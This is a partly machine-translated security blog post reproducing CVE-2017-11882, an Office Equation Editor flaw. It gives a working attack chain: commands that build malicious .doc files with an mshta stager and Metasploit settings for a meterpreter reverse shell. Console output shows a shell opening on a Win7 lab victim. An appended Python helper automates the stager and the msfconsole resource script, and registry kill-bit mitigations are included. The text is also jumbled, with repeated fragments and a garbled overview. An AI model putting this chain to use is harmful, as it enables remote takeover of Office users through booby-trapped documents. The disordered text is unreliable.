CVE-2017-11882 vulnerability: reproducing exploitation with Msf

 

0x02 Exploitation steps

  1. Generate the doc files

    # install and start nginx
    [root@ihoneysec ~]# yum -y install nginx
    [root@ihoneysec ~]# cd /usr/share/nginx/html/
    [root@ihoneysec html]# systemctl start nginx

    # download the python script that generates the doc (repository URL missing from the original page)
    [root@ihoneysec ~]# git clone
    [root@ihoneysec ~]# cd CVE-2017-11882/
    [root@ihoneysec CVE-2017-11882]# ls
    Command109b_CVE-2017-11882.py  Command43b_CVE-2017-11882.py  example  README.md

    # generate the test doc (pops the calculator)
    [root@ihoneysec CVE-2017-11882]# python Command43b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o cve.doc
    [*] Done ! output file --> cve.doc
    [root@ihoneysec CVE-2017-11882]# cp cve.doc /usr/share/nginx/html/

    # generate the doc used with msf (the URL after mshta is missing from the original page; it has to
    # point at the msf server's URIPATH, 172.16.253.76:8080/abc in this walkthrough)
    [root@ihoneysec CVE-2017-11882]# python Command43b_CVE-2017-11882.py -c "mshta " -o cve2.doc
    [*] Done ! output file --> cve2.doc
    [root@ihoneysec CVE-2017-11882]# cp cve2.doc /usr/share/nginx/html/

    # both files are now in the web root
    [root@ihoneysec CVE-2017-11882]# ls /usr/share/nginx/html/
    404.html  50x.html  cve.doc  cve2.doc  index.html  nginx-logo.png  poweredby.png

  

  2. Test: opening the doc pops up calc.exe, the calculator


 

  3. Configure the PoC in msf on Kali:

    root@kali:~# cd /
    # put the downloaded exploit module under the msf exploits directory
    root@kali:/# mv cve_2017_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/
    # check the ip address
    root@kali:/mnt/hgfs/kalishare# ifconfig
    eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
            inet 172.16.253.76  netmask 255.255.0.0  broadcast 172.16.255.255
            inet6 fe80::20c:29ff:fef5:82af  prefixlen 64  scopeid 0x20<link>
            ether 00:0c:29:f5:82:af  txqueuelen 1000  (Ethernet)
            RX packets 3136  bytes 987402 (964.2 KiB)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 255  bytes 20912 (20.4 KiB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    

    # start the postgresql service and open msf
    root@kali:/mnt/hgfs/kalishare# service postgresql start
    root@kali:/mnt/hgfs/kalishare# msfconsole

    ...

           =[ metasploit v4.16.6-dev                          ]
    + -- --=[ 1683 exploits - 964 auxiliary - 297 post        ]
    + -- --=[ 498 payloads - 40 encoders - 10 nops            ]
    + -- --=[ Free Metasploit Pro trial:                      ]

    # search for the cve_2017_11882 module
    msf > search cve_2017_11882

    Matching Modules
    ================

       Name                                Disclosure Date  Rank    Description
       ----                                ---------------  ----    -----------
       exploit/windows/smb/cve_2017_11882                   normal  Microsoft Office Payload Delivery

      # use the module
      msf > use exploit/windows/smb/cve_2017_11882
      # set the payload to a reverse tcp meterpreter
      msf exploit(cve_2017_11882) > set payload windows/meterpreter/reverse_tcp
      payload => windows/meterpreter/reverse_tcp
      # set the local ip
      msf exploit(cve_2017_11882) > set lhost 172.16.253.76
      lhost => 172.16.253.76
      # set the uri path; it must match the one used when generating the doc in step 1
      msf exploit(cve_2017_11882) > set URIPATH abc
      URIPATH => abc
      # check the current settings
      msf exploit(cve_2017_11882) > show options

      Module options (exploit/windows/smb/cve_2017_11882):

         Name     Current Setting  Required  Description
         ----     ---------------  --------  -----------
         SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
         SRVPORT  8080             yes       The local port to listen on.
         SSL      false            no        Negotiate SSL for incoming connections
         SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
         URIPATH  abc              no        The URI to use for this exploit (default is random)

      Payload options (windows/meterpreter/reverse_tcp):

         Name      Current Setting  Required  Description
         ----      ---------------  --------  -----------
         EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
         LHOST     172.16.253.76    yes       The listen address
         LPORT     4444             yes       The listen port

      ...

      # after running the exploit, msf listens on local port 8080; when the win7 machine opens the doc
      # and it fetches 172.16.253.76:8080/abc, a reverse tcp session comes back to port 4444
      msf exploit(cve_2017_11882) > exploit
      [*] Exploit running as background job 0.
      # the handler starts listening
      [*] Started reverse TCP handler on 172.16.253.76:4444
      msf exploit(cve_2017_11882) > [*] Using URL:
      [*] Local IP:
      [*] Server started.
      [*] Place the following DDE in an MS document:
      mshta.exe ""
      msf exploit(cve_2017_11882) > [*] 172.16.253.4   cve_2017_11882 - Delivering payload
      [*] Sending stage (179267 bytes) to 172.16.253.4
      # the reverse tcp connection arrives
      [*] Meterpreter session 1 opened (172.16.253.76:4444 -> 172.16.253.4:49272) at 2017-11-23 15:14:06 +0800
      [*] 172.16.253.4   cve_2017_11882 - Delivering payload
      [*] Sending stage (179267 bytes) to 172.16.253.4
      [*] Meterpreter session 2 opened (172.16.253.76:4444 -> 172.16.253.4:49274) at 2017-11-23 15:14:17 +0800

      # list the established reverse sessions
      msf exploit(cve_2017_11882) > sessions

      Active sessions
      ===============

        Id  Type                     Information             Connection
        --  ----                     -----------             ----------
        1   meterpreter x86/windows  win7-PC\win7 @ WIN7-PC  172.16.253.76:4444 -> 172.16.253.4:49272 (172.16.253.4)

      # interact with session 1
      msf exploit(cve_2017_11882) > sessions -i 1
      [*] Starting interaction with 1...
      # verify that the reverse connection really comes from the win7 machine's ip
      meterpreter > ipconfig

      Interface 11
      ============
      Name         : Intel(R) PRO/1000 MT Network Connection
      Hardware MAC : 00:0c:29:72:2e:7d
      MTU          : 1500
      IPv4 Address : 172.16.253.4
      IPv4 Netmask : 255.255.0.0
      IPv6 Address : fe80::c15d:3813:94ec:d6c8
      IPv6 Netmask : ffff:ffff:ffff:ffff::

      ......
      # drop into a command shell
      meterpreter > shell
      Process 2924 created.
      Channel 1 created.
      Microsoft Windows [Version 6.1.7601]
      Copyright (c) 2009 Microsoft Corporation. All rights reserved.
      # check the current users and the hostname
      C:\Windows\system32>net user
      net user

      User accounts for \\WIN7-PC

      -------------------------------------------------------------------------------
      Administrator            Guest                    win7
      The command completed successfully.

      C:\Windows\system32>

  

 


 

cd Desktop

0x00 Vulnerability overview

二零一七年5月19日,微软发表了7月份的安全补丁更新,在那之中相比较引人关怀的其实悄然修复了隐蔽17年之久的Office远程代码推行漏洞(CVE-2017-11882卡塔尔国。该漏洞为Office内部存款和储蓄器破坏漏洞,影响当下盛行的全体Office版本。攻击者能够选择漏洞以当下登入的顾客的地位施行大肆命令。 由于漏洞影响面较广,漏洞透露后,金睛安全斟酌集体持续对漏洞有关攻击事件展开关爱。5月三日,监控到了原来就有漏洞POC在互连网流传,随时连忙对有关样板举行了剖析。近日该样品全球仅微软杀毒能够检查实验。

  Affected versions:
  • Office 365
  • Microsoft Office 2000
  • Microsoft Office 2003
  • Microsoft Office 2007 Service Pack 3
  • Microsoft Office 2010 Service Pack 2
  • Microsoft Office 2013 Service Pack 1
  • Microsoft Office 2016

 

 

 

using url, local ip, ...

Late at night I received the pushed vulnerability alert; searching online I found that many people had already released scripts that generate the malicious doc and a PoC module for msf. This post records exploiting CVE-2017-11882 with Msf.

python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

0x01 Tools used:

a) reverse tcp listener: kali 172.16.253.76

b) target with Office 2013 installed: win7 172.16.253.4

 

  1. The PoC module used by Msf

  2. Office 2013 and an activation tool

  3. Win7 Ultimate ISO image

The tools above are packaged together; download address:

Link:  Password: xl91


 

set lhost 192.168.1.104

 

Preparation:

The method is very simple: run the command below to generate the malicious doc file.

Enter the command: python Command43b_CVE-2017-11882.py -c "mshta " -o test.doc (the URL after mshta was stripped from the original page; it is the msf server URL)

See the screenshots for details. That completes the exploitation of CVE-2017-11882; from here a whole series of post-exploitation steps becomes possible.

 

As mentioned earlier, we put the py file on the Kali desktop, so mind the path when running it on Kali.

Mitigation: set the kill bit on the Equation Editor COM object (XX.X is the Office version, e.g. 16.0; the Wow6432Node key is for 32-bit Office on 64-bit Windows):

reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\XX.X\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400

kali: 192.168.1.104

 

 

1. Download Microsoft's patch for this vulnerability:

 

 

set uripath abc

You will see: Started reverse TCP handler on 192.168.1.104:4444

mshta.exe ""

I will go through this part carefully so that everyone can follow it.

Open it with Office 2013 and the command executes directly.

exploit

 

The shell comes back successfully.

The same kill bit for the case where Office and Windows have the same bitness (32-bit Office on 32-bit Windows, or 64-bit Office):

reg add "HKLM\SOFTWARE\Microsoft\Office\XX.X\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400


A test.doc file is generated in the same directory.

Next, enter the command: search PS_shell

 

PoC address:

A small trick here: the command is limited to 43 characters, so set a short URIPATH and keep the whole mshta command (including the host, port and path) under 43 characters.
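The walkthrough above needs two things to agree: the mshta URL baked into the doc and the URIPATH (plus SRVPORT and LHOST) configured in msf, all while the 43-byte command limit of Command43b_CVE-2017-11882.py holds. The following is an added example, not code from the original post or from the PoC repository; it derives the doc generator command line and an msfconsole resource script from one set of values, and checks the length budget. The addresses and port are assumptions taken from the walkthrough.

```python
# Added example, not code from the original post or from the CVE-2017-11882 PoC
# repository: keep the mshta stager written into the doc and the msf server
# settings in one place, so the URIPATH in the document and in msf cannot drift
# apart, and enforce the 43-byte command limit of Command43b_CVE-2017-11882.py.
# The addresses and ports are assumptions taken from the walkthrough above.

CMD_LIMIT = 43  # Command43b_CVE-2017-11882.py refuses longer commands


def mshta_stager(lhost: str, srvport: int, uripath: str) -> str:
    """Build the command embedded in the doc; raise if it exceeds CMD_LIMIT bytes."""
    cmd = f"mshta http://{lhost}:{srvport}/{uripath.lstrip('/')}"
    size = len(cmd.encode())
    if size > CMD_LIMIT:
        raise ValueError(f"{cmd!r} is {size} bytes, limit is {CMD_LIMIT}")
    return cmd


def stager_fits(lhost: str, srvport: int, uripath: str) -> bool:
    """True when the stager for these settings is within the 43-byte limit."""
    try:
        mshta_stager(lhost, srvport, uripath)
    except ValueError:
        return False
    return True


def max_uripath_len(lhost: str, srvport: int) -> int:
    """Longest URIPATH that still fits (negative: host:port alone is too long)."""
    return CMD_LIMIT - len(f"mshta http://{lhost}:{srvport}/".encode())


def msf_resource(lhost: str, srvport: int, uripath: str, lport: int = 4444) -> str:
    """msfconsole resource script with the same settings as the walkthrough."""
    return "\n".join([
        "use exploit/windows/smb/cve_2017_11882",
        "set payload windows/meterpreter/reverse_tcp",
        f"set LHOST {lhost}",
        f"set LPORT {lport}",
        f"set SRVPORT {srvport}",
        f"set URIPATH {uripath}",
        "exploit",
    ]) + "\n"


def generator_command(lhost: str, srvport: int, uripath: str, output: str = "cve2.doc") -> str:
    """Command line for the doc generator, carrying the matching stager."""
    stager = mshta_stager(lhost, srvport, uripath)
    return f'python Command43b_CVE-2017-11882.py -c "{stager}" -o {output}'


if __name__ == "__main__":
    lhost, srvport, uripath = "172.16.253.76", 8080, "abc"  # assumed values from the walkthrough
    print(generator_command(lhost, srvport, uripath))
    print(f"URIPATH may be up to {max_uripath_len(lhost, srvport)} bytes with this host and port")
    print(msf_resource(lhost, srvport, uripath))
```

Write the resource script to a file and load it with msfconsole -r; generate the doc with the printed command. With 172.16.253.76:8080 the stager is 35 bytes, which leaves 11 bytes for URIPATH, so the random default msf would pick is likely to blow the budget; that is exactly why the tip above sets a short one.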


 

 

Then copy it to the Win7 machine and open it with Office 2013.

